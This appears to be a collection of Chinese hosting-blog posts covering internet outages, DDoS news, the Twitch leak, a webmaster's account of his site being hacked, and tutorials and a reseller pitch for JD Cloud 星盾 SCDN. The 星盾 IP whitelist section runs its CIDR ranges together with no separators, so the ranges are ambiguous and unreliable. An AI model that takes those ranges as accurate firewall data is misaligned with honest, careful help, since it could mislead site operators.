在案件类型上,知识产权民事案件以著作权纠纷为主,作品类型包括摄影作品、文字作品、电影及类电作品、美术作品、音乐作品等,其中,涉及摄影作品、文字作品、电影及类电作品的案件数量居著作权案件数量的前三位,分别占比51.7%、18.8%、18.2%。 #### 互联网网页永久损失一个月的历史记录 Internet Archive 互联网档案馆 10 月 9~10 日连续遭遇黑客 DDOS 攻击,导致多项服务一度集体下线,核心应用 Wayback Machine 网站时光机直到 10 月 15 日才以只读模式恢复。 而在今天11 月 5 日,在经历因黑客攻击和此后安全修复而导致的近一个月中断后,Internet Archive 互联网档案馆旗下 Wayback Machine 网站时光机现已重新上线网页保存功能 Save Page Now。 这意味着在这将近一个月的时间里,这个全球公益性的互联网档案馆不写入任何新的网页记录,相当于全球互联网历史记录消失了一个月,对于全球互联网来说损失巨大的。 #### 互联网草根 伪草根网站站长的自白 接触互联网虽然还算比较早,但是真正的走上站长这条路,应该算是毕业之后,那是2009年的夏天,随着大学毕业的大流,流向了社会,开始真正的工作。 从最初的技术开始做,最先一直在修改网站代码,间或全手工开发了一些比较简单的网站或功能,也用一些传说中的CMS套出来好几个企业类的网站,大学一直学的就是编程,但是语言不太一样,还算都学过,只是有些很久没用,总体还算可以手到擒来。 一直也都要做些编辑的工作,最开始别人告诉偶发文章要把关键词加上链接,其实开始一直没懂为什么添加这个,总觉的多此一举,后来才知道,原来是这就是传说中的内链。 如此半年,每天改些代码,复制些文章,其他时间就开始研究网站优化了。知道了内容为皇、外链为皇后的道理,渐渐地开始手写原创文章,每天5篇以上,都不知道当初每天怎么能耐下心来一个字一个字的敲出来的,重要的是那些文章都是自己根本不懂的一些轴承知识,只能找文章,然后看遍意思,再慢慢自己写出来。 算是皇天不负有心人,坚持了几个月,网站基本达到了秒收的程度,快照隔天,发布文章很快就有蜘蛛爬行,几分钟后就可以查到收录。 没多久,又应了一句话:“福祸相依”,网站被人黑了,虽然开始就把大部分写权限给禁止了,但是上传的文件夹还必须有写权限,被上传了上万的HTML页面,标题貌似是彩票什么的,都是JS跳转的,虽然不能修改主页,黑客还是在其他论坛发布了链接。 于是,一晚上,百度收录增加了1W多,都是那些静态页面。想不出好的处理方法,只能把那些页面都删除了,变成了传说中的404,悲剧也就开始了。不再秒收,甚至一般都不收录,快照一直停留不更新,后来折腾很多补救方法,比如把删除的页面都用伪静态转成其他页面,禁止百度爬行上传的目录等等,不过一切都没用,应该算是进沙箱观察了,只能硬着头皮每天继续写原创、找友链了。 如此坚持了又是好几个月,某天,发现网站快照正常了,再看收录也基本正常了,几分钟就可以收录。 在这几个黑色的几月里,自然还要研究网站的安全问题了,确定是上传漏洞造成的,关了上传,几天潜心修改代码,还对图片增加了很多验证,觉得基本安全之后开通上传,至今在没被黑过了,偶痛恨之前写代码的人,一点安全不讲,后台都是admin,几个月的努力也只是又算从0开始。还在sqlserver的exe里查到了病毒,应该是sql的漏洞造成的吧,上网查了很多资料,无果,只好把sqlserver里的exe找个正常的全部替换了,还好不影响使用。 除了研究代码,剩下就是要推广网站了。一个B2B的标准网站,权重自然很重要;然后开始找外链,那时候论坛的签名感觉比较有用的,落伍应该是第一个注册的论坛,最悲剧的莫过于百度知道还有百度空间,百度知道里发链接直接不显示,空间被当成广告封了,同时空间指向的链接也被百度删除了,自此害上了百度恐惧症,不再用百度的东西搞推广了。 慢慢的发现自己真的成草根站长了,尽管站不是本人的,但是本人又是一个人在管理,一个多么尴尬的身份。再很长一段时间,其实想自己搞一个网站的,只是发现玩玩还行,要当事业,总是感觉差很大一截,尽管像facebook、QQ等很多几年十几年就崛起的大公司,但是也知道更多的网站都秒杀于雏形了。就想前几年火起来的团购网站,一夜之间仿佛上万的团购网站就破土而出,争得头破血流,然后除了几个能坚持的,剩下的起的起,死的死,周而复始。 从那时百度的一次大更新之后,收录从一万到两万,一下翻倍了,到三万四万,百度的蜘蛛爬行速度也加快了,每天索引五万多的页面,跟着就是VPS的大卡特卡,CPU一直居高不下,网站总是卡卡的,数据多了,程序性能很影响网站速度,分析每天十几M的日志,发现是一些关联查询页面,经常超时,都是分页和排序的功能没做好,一项大工程,分页从网上找来很多代码一个一个测试,最后找到一个还行的,测试100W数据分页整体页面加载需要几秒,就赶快用上了,排序比较麻烦些,主要是因为数据库设计之初排序字段根本没做索引,数据超过一万基本上就慢的要死了,最后只好折中把排序字段都换了。 好景又不长,百度蜘蛛果然是能力很大,网站不卡的情况下每天索引页面都增加;现在VPS又要经受蜘蛛的洗礼,收录四万五万,索引每天五万多。更可恶的雅虎的蜘蛛、搜搜的蜘蛛、搜狗的蜘蛛,一个比一个疯狂,最厉害的应该就是雅虎的,日志看去很多雅虎爬行的记录,网站的日志每天都上20M,于是再次CPU居高不下,网站又开始卡卡的,无可奈何,看日志主要还是数据库查询的效率问题,效率低的一般很容易超时,只能继续优化页面,看来是个长期的过程。 相比技术方面,对网站来说推广更让人头疼了,一直在寻找出路,一直在迷茫,每天都有用户发布一些供求信息,比起最初还要自己去替别人发已经好多了。 广告、会员,这些一般收费项目,实在是搞不起来。很久前还找人开发过一个型号查询软件,后来不满意,就自己开发了一个,发布到了几个主要软件网站,每天都有几个人在用。可恶的就是天空软件,不给发布,注册的会员也给删除了,软件一直被老板说是利器,但是软件里的数据一直找不到最新的,原本也是想卖钱的,后来只能免费了。 开始搞网站一直觉得友链作用不会很大,但是就是那次被黑之后,快照一直不更新;经过几个月之后某天突然正常了,想想,除了坚持原创之外,貌似前一天刚换了一个收录十几万的一个友链,虽然不确定,但是肯定很有帮助;至少对于PR来说,友链很明显,从1到4,其实没用多长时间,可惜后来谷歌离开掐那,谷歌一次大更新之后,从4又回到3,查了一下类似网站,PR基本都降级了,看来是大调整。 这几年迅速火起来的东西貌似很多,微博、微信、SNS,据说有人微博营销月入十万或更多的都有,阿江做了个51la有钱了,雨林木风的那谁有车有房了,可惜,一个没赶上。 通过这几年搞B2B,还有和别人的交流,发现信息量对这类网站确实很重要,有了信息量,用的人就越来越多,以前没听过慧聪,后来看到都是百度推广的广告,然后居然就是B2B的老二了。 这几年我总是觉得B2C应该不错,可惜不是一般人能做起来的,除了几个看起来投入特别大的电商,都是原本大商场搞起来的。 原本觉得是电商应该可以比实体店便宜很多的,但是最近买手机比较各方面的报价,发现京东的价格比一些实体店面都要贵一些,想想也是,上门服务,还有各地的仓库,都是要钱的,物流就是目前电商最大的难题,这些大大的降低了电商的竞争力,如果服务在稍微差点,基本上就要关门了。 至少从这几年来看,要把一个论坛搞起来很不容易的,泡沫总是比较容易碎掉。用户体验这个东西其实确实很重要,真正的体验都是细节,比如论坛程序,dz做的越来越好了。 简单总结一下: 1、内容为皇,外链为皇后是真的,如果你能坚持写原创,就是一个不做外链的博客,应该也可以有很好的排名,当然,能配合一些合情合理的外链,才是正道。 2、B2B类的网站,需要信息量支撑。 3、创意是一个网站成功的捷径。 4、用户体验什么时候都很重要。 5、坚持。 6、品牌或信誉很重要。 7、网站安全很重要。 PS:伪草根就是离草根还差点。 #### 互联网骨干网提供商 Cogent 关闭俄罗斯服务 ,导致互联网访问变慢 不让外国电信运营商在中国运营是正确的。3 月 6 日消息,据《华盛顿邮报》报道,Cogent Communications 是一家通过洲际连接路由数据的互联网骨干网供应商,该公司因俄乌战争而切断了俄罗斯客户的服务。 Cogent Communications 总部位于美国,是世界上最大的互联网骨干网供应商之一,为 50 个国家的客户提供服务,其中包括一些知名的俄罗斯公司。 一封致俄罗斯客户的信中,Cogent 将“经济制裁”和“日益不确定的安全局势”列为其在该国全面关闭的动机。Cogent 同样告诉 The Verge,它“终止了与俄罗斯客户的合同”,以遵守欧盟禁止俄罗斯国家支持的媒体机构的举措。 互联网分析师 Doug Madory 指出,该公司的俄罗斯大客户包括电信巨头 Rostelecom、俄罗斯搜索引擎 Yandex,以及俄罗斯最大的两家移动运营商:MegaFon 和 VEON。 Madory 指出,Cogent 停止俄罗斯的服务可能会导致该国连接速度变慢,但不会完全断开俄罗斯与互联网的连接。来自 Cogent 的流量将转而流向该国的其他骨干网供应商,因此可能会导致网络拥挤。 #### 亚洲游戏行业史上最大黑客 DDoS 攻击,峰值达 3.74Tbps,微软扛下来了 黑客攻击太猖獗,游戏行业危了。最新事件,一次针对我的世界线上直播赛的 DDoS 攻击,让欧洲国家安道尔全国接近断网半小时。这个国家,他就只有这么一个电信公司,手机用户也遭殃。 事实上,从去年下半年开始,不少网络游戏都曾因网络攻击而瘫痪。8 月,最终幻想 14 欧洲服务器遭攻击瘫痪,12 个小时后才恢复。12 月,暴雪美国服务器遭 4 小时持续攻击夜袭,守望先锋、魔兽世界、炉石传说玩家都没得玩了。 国产手游《弈剑行》遭黑客勒索攻击,开服首日即停服。开发商没有给黑客交“保护费”,而是原路退款所有玩家充值,损失惨重。甚至一度考虑把研发了 3 年的联机游戏改成单机版。 这期间被盯上的游戏还有逃离塔科夫、黎明杀机等。泰坦陨落 1 因无力对抗恶意攻击,发行商 EA 直接选择下架停售。 现在,微软还最新披露,去年 11 月 Azure 云的一个亚洲客户遭遇了史上最大规模 DDoS 攻击。这是一次分布式攻击,有来自十多个国家和地区的上万个攻击来源,带宽峰值达 3.74Tbps,比上一次最高纪录高出 50%。 2-3Tbps 的大规模 DDoS 攻击在 12 月还有两次,直到现在公布才被人所知。因为微软自己都给扛下来了。 攻防实战之外,微软也对 Q3 和 Q4 两季度所有 DDoS 攻击情况做了统计分析。发现游戏行业是黑客的首要目标,手游流行的中日韩和印度成了重灾区。 DDoS 攻击为什么瞄准游戏 黑客团伙用 DDoS 手段攻击游戏,很多是为了勒索赎金。线上游戏比较吸金,生命周期又短,游戏公司为了能赚到钱,很容易向黑客低头,支付“保护费”。像上面提到的《弈剑行》开发商这种,自己承担更大损失和黑客硬刚的其实不多。DDoS 攻击的成本足够低廉,攻击未受保护的站点只需 300 美元 / 月的成本。 游戏一方的防御成本却很高。多人游戏就怕网络问题,黑客都不需要花大力气把服务器搞瘫痪,仅仅是出现延迟都能影响玩家体验。游戏服务器又需要 7*24 小时在线,对服务器的稳定性要求很高,一旦受到攻击很容易造成玩家流失,进而游戏口碑下降。 针对游戏的 DDoS 攻击方式中,最常见的是“UDP 洪水”。2021 年下半年,UDP 洪水攻击占所有攻击的 55%,比上半年增加了 16%。 UDP 即用户数据报协议,无需建立连接就可以发送数据,优点是开销小速度快,缺点就是安全性不如 TCP 协议高。攻击者不必事先获取通信权限,就可以使用 UDP 向目标服务器的多个端口发送大量数据。反过来,目标服务器必须发送相同大小的数据包,告诉每个攻击来源这个端口不可用。最终淹没在数据洪流里,正常用户的访问请求也被堵塞。 防范的办法当然也有,各大云服务商和网络安全公司都有针对 DDoS 攻击的安全服务。不过这些服务通常价格较贵,小公司也很难负担得起,勒索游戏公司的黑客也就越来越猖獗了。 小型项目有一个选择是像 Cloudflare 这样的安全服务,价格从免费至 200 美元 / 月都有。国内可以用百度云加速,价格免费到2万左右。还能做的,一个是尽量保护住服务器真实 IP 地址,一个是积极报警。 值得一提的是,DDoS 攻击在很多国家都是要判刑的。在我国属于破坏计算机信息系统罪,处五年以下有期徒刑或者拘役。后果特别严重的,处五年以上有期徒刑。 #### 亚马逊 AWS 云服务故障导致Disney+等多个网站和服务瘫痪 据CNBC报道,亚马逊云计算服务 AWS 在当地时间周二发生宕机,导致一些网站和服务瘫痪,并且对多项亚马逊服务造成影响。 图片来自 AWS 据悉,此次宕机对亚马逊配送业务造成了重大影响,因为依赖云服务提供的帮助,在 AWS 宕机后,许多司机无法获得包裹或者货运路线。亚马逊自己的 Amazon Flex 送货员也无法登录应用获得任务。这造成亚马逊电商服务出现货物堆积等现象。 亚马逊网络服务的状态页面上的一个通知说,它在某些API和AWS管理控制台方面遇到了问题。这些问题影响了AWS在弗吉尼亚州北部托管的主要US-East-1区域,所以不是所有的用户都可能遇到了故障。 此外,在报告因中断而出现问题的服务中,包括迪士尼的流媒体订阅服务Disney+、Netflix、Slack、Ticketmaster、股票交易应用程序Robinhood和美国最大的加密货币交易所Coinbase。 #### 亚马逊 Twitch 直播遭到了黑客攻击,泄露了源代码 10 月 7 日消息 据 The Verge 此前报道,亚马逊 Twitch 直播遭到了黑客攻击,泄露了源代码、用户评论历史记录和详细的财务记录。 今日,Twitch 发布了一个关于大规模黑客攻击的声明,表示由于 Twitch 服务器配置更改中的一个错误,随后被恶意第三方访问,数据被泄露到了互联网上。Twitch 补充称,其团队正在“紧急”调查此次攻击。 Twitch 还表示,“没有迹象”表明任何登录凭证(包括密码)被泄露,出于谨慎起见,已经重置了所有流媒体密钥,并提供了一个链接来获取新的密钥。 因此,根据用户使用的广播软件不同,可能需要手动更新软件以启动新的流媒体,Twitch Studio、Streamlabs、Xbox、PlayStation 和 Twitch 移动 App 用户不需要进行任何操作。 IT之家了解到,4chan 消息板上的一个匿名帖子发布了一个 125GB 的种子文件,他们声称其中包含了 Twitch 及其提交历史的全部内容。此外,还有一个亚马逊未发布的对标 Steam 平台的项目 Vapor 的源代码。泄露的文件包括: 所有 Twitch 源代码 评论历史数据 财务详情,包括 2019 年以来的支出 Twitch App 的源代码,包括手机端、桌面端、主机端 尚未发布的 Steam 竞争对手 Vapor 内部安全工具 专有 SDK、内部 Amazon Web 服务工具 #### 亚马逊中国挂了!原因可能是清仓大甩卖导致服务器宕机 4月29日 消息:今天中午,有微博用户反映亚马逊中国挂了,疑似因清仓大甩卖,大量用户涌进亚马逊平台进行抢购,导致网站服务器崩溃。 主机吧登录中国亚马逊官网www.amazon.cn,页面显示,报歉,由于程序执行时遇到意外错误,您刚刚操作没有执行成功,请稍后重试,或将此错误报告给我们的客服中心:service_bj@cs.amazon.cn。 此前亚马逊中国发出将清仓大甩卖消息,包括美妆、图书在内的多种商品均在原有基础上大打折扣,其中部分图书更是 4 折出售。 据了解,亚马逊方面曾宣布将于 2019 年 7 月 18 日停止为亚马逊中国网站上的第三方卖家提供卖家服务,将保留亚马逊海外购、亚马逊全球开店、Kindle和亚马逊云计算等业务。 也就是说亚马逊中国基本可以说是倒了,干不过淘宝京东了,此次大甩卖有点像超市倒闭大清仓的感觉…… #### 亚马逊促销日瘫痪 原因是:使用 Aurora 替换 Oracle 据外媒CNBC获得的内部文件显示,亚马逊迁离Oracle的数据库使用Aurora PostgreSQL是Prime Day促销日陷入瘫痪的主要原因。 这次故障突显了亚马逊希望在2020年之前完全摆脱Oracle数据库的过程中可能面临的挑战。 近年来亚马逊和Oracle在打口水仗,声称自家数据库软件和云工具的性能更胜一筹。 亚马逊现在算是领教了迁离Oracle数据库软件有多困难。 据CNBC获得的一份内部报告显示,在Prime Day促销日,这个头号电子零售商一边忙着处理导致销售流程减慢的重大网站故障,一边忙着应对其在俄亥俄州最大的一个仓库遇到的技术问题,该技术问题导致成千上万件包裹发货延迟。 文件显示,这个问题很大程度上归咎于亚马逊从Oracle数据库迁移到自家的数据库技术。这次故障突显了亚马逊希望在2020年之前完全摆脱Oracle数据库的过程中可能面临的挑战,以及重新获得这种级别的可靠性有多难。这还表明Oracle的数据库在一些方面确实比亚马逊的同类软件更高效,Oracle可能会在本周于旧金山举行的年度OpenWorld大会上强调这一点。 Prime Day故障发生后,亚马逊的工程师撰写了一份长达25页的报告,亚马逊称这是纠正错误。亚马逊采用这套标准流程,试图了解重大事故为何发生、如何防止将来重蹈覆辙。 报告显示,亚马逊努力查明Prime Day问题的根本原因,原因是数据库迁移之后丢失了一项功能。文件显示,万一刚安装的数据库(名为Aurora PostgreSQL)出现错误,亚马逊也未给出应急方案。 在一个问题中,工程师被问及为什么亚马逊的仓库数据库没有遇到“上一次流量高峰期间(那时使用Oracle数据库)的同一个问题”。他们回答,“Oracle和Aurora PostgreSQL是两种不同的[数据库]技术”,处理“保存点”(savepoint)的方式不一样。 保存点是一种重要的数据库工具,用于跟踪和恢复单个事务。报告称,在Prime Day当天,创建了数量过多的保存点,亚马逊的Aurora软件不堪重负,因而拖累了数据库的整体性能。 无论如何都有可能发生 CNBC透露了文件的细节后,伊利诺伊大学厄巴纳-尚佩恩分校的计算机科学教授马特•西泽(Matt Caesar)说:“如果亚马逊坚持使用Oracle数据库,很可能不会发生这次故障。此外,如果亚马逊使用Oracle的数据库,似乎能够更早地诊断问题,从而有望缩短故障的持续时间。” 亚马逊的发言人在通过电子邮件发表的声明中对这个问题轻描淡写,称没有什么故障,尽管内部文件声称数据库“性能降级导致了滞后和严重故障。” 发言人说:“有必要指出这一点,那就是该仓库从未发生过什么故障,问题只是导致了约1%的包裹出现短时间的发货延迟。这个问题很快查明并得到了解决。” 俄亥俄州的这个仓库是在Prime Day之前迁离Oracle数据库的13个仓库中最大的一个。文件称,在Prime Day促销活动期间,该仓库每天处理的包裹超过110万件。处理库存和发货数据的所有服务和软件已统统迁移到了那些仓库中的Aurora数据库上。 据报告声称,这次故障在Prime Day持续了数小时,导致15000多件包裹发货延迟,还浪费了约90000美元的劳动力成本。损失不包括工程师们排除和修复错误所耗费的所有时间或任何可能错失的销售订单。 在报告里头名为“汲取教训”的部分,亚马逊的工程师写道:“保存点在Aurora PostgreSQL中的行为与其在Oracle中的行为不一样”,言外之意是Oracle的软件处理问题更有效。报告还称,没有用于PostgreSQL中分析的SQL语句数据,而要是有该数据,“原本有助于查明”问题的根本原因。 要是亚马逊做好更充分的准备,这次故障也许不那么严重。在文件的一个部分,该公司称,由于“底层PostgreSQL数据库遇到性能问题时缺少应对方案”,“结果花了很长的时间才解决”问题。文件还声称,一份“完备的应对方案或操作手册”原本有助于“更快地消除影响”。 哥伦比亚大学的计算机科学教授亨宁•舒尔茨莱宁(Henning Schulzrinne)看了文件后说:“我猜想,亚马逊刚更换了数据库,并没有测试在亚马逊Prime Day那天出现的具体的负载模式,结果大吃一惊 ”。 近年来,亚马逊和Oracle一直在打口水仗,原因是亚马逊扩大了软件品种,与Oracle更加正面较量了。CNBC在8月份曾报道,亚马逊正努力在2020年初之前将整套数据库从Oracle迁移出去。 “真的很难” Oracle董事长兼联合创始人拉里•埃里森才不信亚马逊的说法。在该公司去年12月份的财报电话会议上,埃里森称亚马逊“没有迁离Oracle”。他在今年8月份的一次活动中重申了观点,他说:“我认为亚马逊做不到这一点。” 他说:“亚马逊有10年的时间来迁移Oracle,但现在仍使用Oracle。而使用自己的技术对它们来说并不容易。那么做不具有成本效益。我的意思是,真的很难。” 市场研究公司Moor Insights & Strategy的首席分析师帕特里克•穆尔黑德(Patrick Moorhead)表示,这一事件表明,旧的应用软件(就像亚马逊仓库中使用的那些应用软件)迁离Oracle有多难;几十年来,Oracle一直在与世界上最大的企业合作。 他说:“AWS Aurora是为前瞻性应用软件设计的,而Oracle是为较传统的应用软件设计的。” #### 亚马逊免费云存储服务 Amazon Drive 明年正式关停 11 月 15 日消息,美国科技巨头亚马逊首席执行官安迪・贾西(Andy Jassy)正积极削减成本,Alexa、机器人、零售等部门均受影响。今天,亚马逊宣布旗下的云存储服务 Amazon Drive 将于 2023 年 12 月 31 日正式关停。 图片来自于 Ghacks 目前,Amazon Drive 官网已经放出了公告,亚马逊也向使用该服务的用户发送了电子邮件。 据了解到,亚马逊表示自 2023 年 1 月 31 日起不再接受新文件的上传,但用户可以在该日期之前继续访问文件,之后将不再支持新增或者修改文件。 图片来自于 Ghacks Amazon Drive 用户可以在 2023 年 12 月 31 日之前访问和下载文件,在该日期之后该服务正式关停,所有用户无法访问 Amazon Drive。 亚马逊推荐用户可以将照片和视频继续保存到 Amazon Drive 上,然后通过 Amazon Photos 进行访问。和 Drive 不同的是,Photos 服务目前仍处于运转状态。用户可以在 Amazon Photos 网站或者应用中访问已经上传的图片和视频。 AmazonDrive云存储服务于2011年3月推出,作为“亚马逊客户备份文件的安全云存储服务”,提供5GB免费存储空间以及适用于Android、iOS和Web的应用程序。 #### 亚马逊算是彻底推出中国了,Kindle中国电子书店6月30日停止服务 6月2日 消息:亚马逊官方最新公告称,Kindle 中国电子书店将于2024年6月30日停止云端下载服务。这意味着,未下载的电子书将无法进行下载和阅读,相关客户服务届时也将停止支持。 为了帮助用户处理个人数据,亚马逊建议用户及时将已购买的电子书下载至 Kindle 阅读器和 Kindle App,并保持亚马逊账户登录状态,以便在停止服务后继续阅读。 据悉,Kindle 在2022年宣布退出国内市场,再在2023年6月30日停止了 Kindle 中国电子书店运营。官方承诺将为用户提供退款服务,并表示服务会一直保持到2024年6月30日。尽管官方书店停止了运营,但多款 Kindle 仍可以下载安装第三方阅读软件,例如微信读书等,以继续阅读。 #### 交易类网站好消息:百度商家“保”标识认证免费开放 百度近期开放商家网站“保”标识通道,符合要求的商家网站可以免费申请参保。 了解到,一旦商家网站申请保字标识系统通过审核参保后,在百度搜索中相应网站及其所有字页面都会对应展现保字标识,而用户在通过审核带有保字标识网站中出现问题时,百度会介入处理调解赔偿,投保期间出现欺骗和商家跑路行为,投保网站担全责,大大改善了之前百度搜索中一些网站欺骗和信任度问题。 不过像一些敏感网站,像医疗,金融,棋牌,按摩类的商家站百度直接明确拒绝不给开通的,估计被他们折腾怕了! 申请地址https://baozhang.baidu.com/guarantee/ 百度这申请还是比较麻烦的,还要转战百度APP申请,申请条件如下图: 主机吧认为如果有条件的还是申请下吧,搜索有个保字,用户都放心很多。 #### 京东云星盾 SCDN个人实名无法购买怎么办? 最近,京东云星盾安全加速SCDN个人无法购买了,只能通过企业实名的帐户购买。 这挺离谱的,第一次见不要个人购买的CDN产品,毕竟个人用户数量远比企业多,虽然购买力没有企业高,但也是消费能力哈,看不懂京东为啥不让个人买。(主机吧怀疑可能是个人用户创建违法太多,导致星盾被举报了) 很多想用星盾的小伙伴一定很郁闷,那我如果没有企业认证的帐户要怎么开通京东云星盾呢? 主机吧这边有办法,直接通过主机吧代理这边购买即可,不需要自己注册帐户,直接通过主机吧代理开通即可。 开通后,主机吧给客户创建一个子帐户管理单独管理套餐,功能上没有任何区别。有需要的小伙伴可以联系主机吧优惠购买。 https://zhujib.com/jdxingdun.html #### 京东云星盾CDN IP段白名单 接入京东云星盾的时候,如果服务器有防火墙的,一定要提前把星盾的IP段加入白名单,否则容易误拦截掉星盾的IP。以下是星盾的IP段白名单: 1.86.232.128/271.86.232.160/2727.36.126.192/2727.36.126.224/2736.249.83.0/2736.249.83.32/2742.7.38.0/2642.7.38.64/2642.81.59.0/2642.81.59.64/2642.202.211.128/2642.202.211.192/2658.243.5.64/2758.243.5.96/2760.13.99.0/2660.13.99.64/2661.139.247.64/2761.139.247.96/2761.159.93.0/2761.159.93.32/2761.159.93.128/2761.159.93.160/27111.31.57.0/27111.31.57.32/27111.31.120.64/27111.31.120.96/27111.123.246.128/27111.123.246.160/27112.49.47.64/27112.49.47.96/27114.67.161.0/28114.67.161.32/27114.67.161.64/28114.67.161.80/28114.67.192.192/28114.67.192.208/28115.231.135.0/27115.231.135.32/27116.141.242.0/26116.141.242.64/26116.163.41.0/26116.163.41.64/26116.177.230.64/26 116.177.238.0/26116.198.49.128/28116.198.49.144/28116.198.165.0/28116.198.165.16/28119.188.204.0/27119.188.204.32/27120.220.222.64/27120.220.222.96/27120.232.150.128/27120.232.175.96/27121.17.125.0/27121.17.125.32/27121.207.227.0/26121.207.227.64/26122.189.239.128/26122.189.239.192/26124.225.84.0/27124.225.84.32/27150.138.153.128/26150.138.153.192/26153.35.50.128/26153.35.172.0/26183.146.21.0/27183.146.21.32/27183.204.41.0/26183.204.41.64/26183.216.188.192/27183.216.188.224/27198.41.130.0/28198.41.130.16/28218.77.94.0/26218.77.94.64/26222.138.197.128/27222.138.197.160/272400:cb00:164:0:1000::/682402:db40:51b5:10::/642403:1ec0:1400:ff01::/642403:1ec0:1400:ff05::/642403:1ec0:1400:ff10::/642403:1ec0:1610:ff05::/642408:8630:20a0:4:1000::/682408:8719:64:50:1000::/682408:871a:8810:205:1000::/682408:8722:1010:5:1000::/682408:8736:1802:0:1000::/682408:873d:2812:103:1000::/682408:8744:2000:1002:1000::/682408:8748:c110:45:1000::/682408:874f:b000:6:1000::/682408:8752:600:6:1000::/682408:8756:4cff:d002:1000::/682408:8760:107:2:1000::/682408:8776:1:67:1000::/682409:8c02:21c:30:1000::/682409:8c02:24c:c4:1000::/682409:8c34:d00:6:1000::/682409:8c38:c60:202:1000::/682409:8c3c:1300:50a:1000::/682409:8c44:1:ff04:1000::/682409:8c54:810:80a:1000::/68240e:f7:7000:c7:1000::/68240e:f7:ef00:f:1000::/68240e:658:2400:204:1000::/68240e:90d:1101:204:1000::/68240e:914:6:d:1000::/68240e:928:101:300:1000::/68240e:935:a00:1706:1000::/68240e:935:a00:1707:1000::/68240e:938:110:204:1000::/68240e:944:8:5:1000::/68240e:950:c00:101:1000::/68240e:965:801:106:1000::/68240e:969:5000:3:1000::/68 #### 京东云星盾cdn支持websocket了 Websocket是用于服务端主动向客户端推送消息的技术。传统的HTTP/HTTPS只能由客户端向服务端发起请求,服务端对请求一一响应。在需要获取服务端状态变化的场景下,如:提交的后台任务是否执行成功,只能通过客户端轮询向服务端发起请求,不仅效率低,还浪费资源(HTTP1.0下每次轮询都需要经过TCP三次握手重新建立连接)。而WebSocket的出现较好的解决了这个问题,在TCP首次建立完连接之后,该连接不自动关闭,在有效期内客户端可以继续向服务端发送消息,服务端也能主动给客户端发送消息。 京东云星盾安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 京东云星盾代理折扣优惠活动:https://zhujib.com/jdxingdun.html 京东云星盾CDN依靠全球广泛部署的CDN节点,高效的网络存储优化方案和精准的调度策略,有效提升下载速度、降低响应时间,提供流畅的用户体验。腾讯云CDN节点自研服务器在提供静态资源访问的能力下,同时支持WebSocket访问,兼容动态资源的极速上云服务。 开启方法: 进入星盾域名管理 - 高级设置 - 网络设置 - WebSocket开启即可。 #### 京东云星盾CDN支持缓存哪些文件 缓存文件类型 京东云星盾安全加速SCDN 通过文件扩展名类型进行资源缓存,它支持自动缓存包含某些文件扩展名的文件。 目前安全加速SCDN支持的静态资源缓存内容如下: bmp、ejs、jpeg、pdf、ps、ttf class、eot、jpg、pict、svg、webp css、eps、js、pls、svgz、woff csv、gif、mid、png、swf、woff2 doc、ico、midi、ppt、tif、xls docx、jar、otf、pptx、tiff、xlsx 注:SCDN默认不缓存HTML等文件类型,如需缓存特定内容,需通过页面规则功能设置需要缓存的URL。 #### 京东云星盾cname半接入如何添加子域名解析 使用京东云星盾半接入的同学很多不会做子域名解析,这里主机吧来说明下。 1.配置子域名 进入域名管理,DNS配置 添加解析,主机名写:子域名前缀 IPV4地址:写你源服务器IP 一定要购选代理安全加速 2.配置解析 京东云星盾的半接入子域名添加并不会显示cname记录,这个对第一接入的人来说,是找不到北的。 其实找到子域名的cname记录很简单,我们进入域名管理就可以看到根域名的cname记录了 然后我们在根域名cname记录前面加上子域名前缀,就是子域名的cname记录了。比如根域名cname记录是zhujib.com.lk-3a1178.cloud-scdn.com,那么子域名的记录就是 ziyuming.zhujib.com.lk-3a1178.cloud-scdn.com 3.进入域名DNS解析 好了,以上就是我们的星盾的半接入如何解析子域名的全教程了,有什么不懂的可以留言。 #### 京东云星盾SCDN产品架构 安全加速SCDN,基于京东优质网络基础设施和云计算技术,向您提供安全、高性能、高可靠的安全加速服务。 利用广泛的节点覆盖和先进的智能解析调度,结合国际顶尖技术,将内容更快、更可靠、更安全地投递给终端用户,降低网站运营成本、提高站点安全性、提升用户访问体验。 京东云安全加速SCDN可以为您解决以下问题: 安全性,提升网络应用的安全性,通过防火墙、安全规则控制,有效防御互联网攻击。 性能,对应用内容、静态资源优化加速,将内容更快的传递给终端用户,有效提升用户体验。 可靠性,DNS智能调度实现就近访问、多POP点容灾,并具备DNS攻击防御能力,有效解决网络基础设施故障带来的风险。 #### 京东云星盾SCDN域名泛解析的方法 最近,有位站长在使用京东云星盾的时候,需要用到泛解析,但不知道该怎么操作,今天主机吧来给大家讲解下如何操作。 1.进入京东云星盾配置泛子域名 主机名* IPV4地址填写你的服务器IP 确任即可 2.进入域名解析管理,添加对应京东云星盾cname别名 主机记录可以是* 也可以是填你具体的子域名 需要注意的事,这个记录值是在京东云星盾域名管理里可以看到,添加泛解析后,任意前缀都是可以当成解析记录值。 比如京东云星盾配的记录值为zhujib.com.lk-7775eb.cloud-scdn.com,那么我们在域名DNS里解析可以是.1.zhujib.com.lk-7775eb.cloud-scdn.com,也可以是2.zhujib.com.lk-7775eb.cloud-scdn.com都是可以当成泛域名解析来用的。 简单来说,在京东云星盾里添加泛域名解析后,cname别名任意子域名都可以当成解析记录。 好了,以上就是我们的京东云星盾泛解析教程了,如需要京东云星盾优惠可以找我们。 #### 京东云星盾SCDN如何开启CC防护 最近有站长使用星盾的时候不知道怎么开启CC防护,这里主机吧教大家。 进入星盾管理,安全规则,托管规则 2.开启WEB应用程序防火墙 3.进入防火墙设置 4.开启BOT识别模式、安全级别调为:遭受攻击、开启浏览器完整性检查 完成操作后,星盾就可以拦截CC攻击了,如有特别需求的也可以自行创建防火墙规则,这里我们就不多说了。 #### 京东云星盾SCDN如何激活域名 发现很多站长开通京东云星盾后不知道如何激活域名,这里主机吧给大家讲解析激活过程。 1.添加域名,选择半接入 为什么选择半接入呢?因为生效快,NS接入一般需要2小时左右,如果不急的话可以选NS 2.添加域名可以看到cname记录和TXT记录 3.进入域名解析 添加记录类型:cname 主机记录@ 记录值:之前添加域名得到的 cname记录,如下图: 4.添加TXT记录 添加记录类型:TXT 主机记录verify 记录值:之前添加域名得到的 TXT 记录,如下图: 好了,等15分钟左右就会激活了。 #### 京东云星盾SCDN如何设置域名白名单 